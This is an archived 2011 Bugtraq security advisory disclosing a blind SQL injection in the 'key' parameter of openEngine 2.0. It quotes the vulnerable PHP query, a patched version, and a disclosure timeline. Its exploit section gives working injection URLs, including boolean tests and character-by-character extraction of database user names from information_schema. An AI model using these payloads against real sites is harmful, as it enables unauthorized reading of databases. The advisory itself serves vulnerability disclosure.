lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-Id: <201110090934.p999YOVp005695@sf01web3.securityfocus.com>
Date: Sun, 9 Oct 2011 09:34:24 GMT
From: sschurtz@...nline.de
To: bugtraq@...urityfocus.com
Subject: openEngine 2.0 'key' Blind SQL Injection vulnerability

Advisory:              	openEngine 2.0 'key' Blind SQL Injection vulnerability
Advisory ID:           	SSCHADV2011-026
Author:                	Stefan Schurtz
Affected Software:  	Successfully tested on openEngine 2.0 100226
Vendor URL:          	http://www.openengine.de/
Vendor Status:       	informed
CVE-ID:                	-

==========================
Vulnerability Description
==========================

The 'key' parameter in openEngine 2.0 is prone to a Blind SQL Injection

==================
Technical Details
==================

# vul code in 'openengine/cms/system/02_page/includes/admin.php' 

$query = "SELECT * FROM ".$db_praefix."page WHERE (page_key = $page_key) AND (page_status <= ".$account_status.") $access";

==================
Exploit
==================

# Database information
User: easy

# Blind SQL Injection

http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR 1=2 -> "Sie m?chten die Seite versenden."
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR 1=1 -> "Sie m?chten die Seite Homepage (de) versenden."

# User-Guessing

http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),2,1)) = 101 
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),3,1)) = 97
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),4,1)) = 115
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),5,1)) = 121

=========
Solution
=========

$query = sprintf("SELECT * FROM ".$db_praefix."page WHERE (page_key = %d) AND (page_status <= ".$account_status.") $access;",$page_key);

====================
Disclosure Timeline
====================

08-Oct-2011 - informed developers
08-Oct-2011 - release date of this security advisory

========
Credits
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References
===========

http://www.openengine.de/
http://www.rul3z.de/advisories/SSCHADV2011-026.txt
http://www.rul3z.de/advisories/SSCHADV2011-019.txt

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ